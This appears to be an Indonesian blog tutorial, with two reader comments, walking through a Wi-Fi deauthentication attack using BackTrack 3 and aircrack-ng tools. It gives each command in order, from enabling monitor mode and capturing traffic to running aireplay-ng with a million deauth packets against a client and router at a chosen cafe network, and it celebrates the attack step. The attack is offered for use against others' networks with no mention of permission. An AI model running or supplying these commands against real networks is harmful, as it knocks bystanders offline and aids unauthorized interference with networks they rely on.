[Image: Picture1.jpg]

langsung aj..Ngakak

Pertama tama kmu harus siapin peralatan perang dulu..(kayak beneran perang jd nya..hehe..)..

1. Tentunya Sebuah Laptop yaaah spesifikasinya paling tidak network card nya atheros seperti punya saya..
2. Kemudian di laptop yang akan digunakan harus menggunakan OS Backtrack...kebetulan saya menggunakan backtrack 3 Final..

Oke...
langsung saja....

1. Langkah 1
Buka Console..kemudian ketikkan command 'airmon-ng' (tanpa tanda ')
seperti gambar di ini..


# dari command di atas..kita harus memilih salah satu interface yang mau digunakan...
# Langkah 2
Kebetulan saya menggunakan ath0 untuk memonitor jaringan..jd saya ketikkan perintah..
'airmon-ng stop ath0' (tanpa tanda ')
seperti gambar ini..

[Image: Picture2.jpg]

Langkah 3
Pada langkah ini monitor mode akan saya enable kan...dengan menggunakan command 'airmon-ng start wifi0' (tanpa tanda ')
hasilnya pada gambar ini..

[Image: Picture3.jpg]

Langkah 4
Kemudian ketiikkan command 'airodump-ng ath0' (tanpa tanda ')..command ini berfngsi untuk menangkap atau meng-capture segala aktivitas yang ada pada jaringan yang tertangkap oleh interface yang kmu gunakan..lihat gambar..

[Image: Picture4.jpg]
dan
[Image: Picture5.jpg]

Langkah 5
Nah..kamu sudah bisa mencari target yang akan kamu serang...pada kasus ini saya memilih target cafe
Kemudian buka console lagi..lalu ketikkan command,,'airodump-ng --channel 6 --bssid 00:21:27:E8:AF:16 -w hasil ath0' (tanpa tanda ')
Lihat gambar..

[Image: Picture6.jpg]

Maksud command tadi adalah menyimpan hasil capture yang telah dilakukan untuk kemudian disimpan ke dalam file hasil dan memilih satu channel untuk menampilkan ip,mac,bssid,packet dan sebagainya secara detail..

Langkah 6
Pada langkah ini akan terlihat hasil seperti pada gambar..

[Image: Picture7.jpg]

Langkah 7
Nah...langkah ini yang saya suka....ATTACK!!!!...hehe....buka console baru....kemudian ketikkan command..'aireplay-ng --deauth 1000000 -c 00:1C:BF:06:08:07 -a 00:21:27:E8:AF:16 ath0' (tanpa tanda ')...-c berarti masukkan bssid client..kemudian -a masukkan bssid router..

[Image: Picture8.jpg]


Langkah 8
Ini adalah tampilan ketika serangan sedang dilancarkan..hehe..

[Image: Picture9.jpg]

sekian tutorial deauthentication attack using backtrack 3 final

mohon maaf bila ada kata yang salah...

mohon koreksi dari temen temen...

thanks...

2 komentar:

  1. wah ini yang saya cari ...

    coba ah,,

    kalo Deauthentication bukannya gak musti atheros

    ReplyDelete
  2. ya juga sih gan....

    tapi kan networkcard atheros tu pnya kejelian khusus buat Deauthentication...

    ReplyDelete

 
Top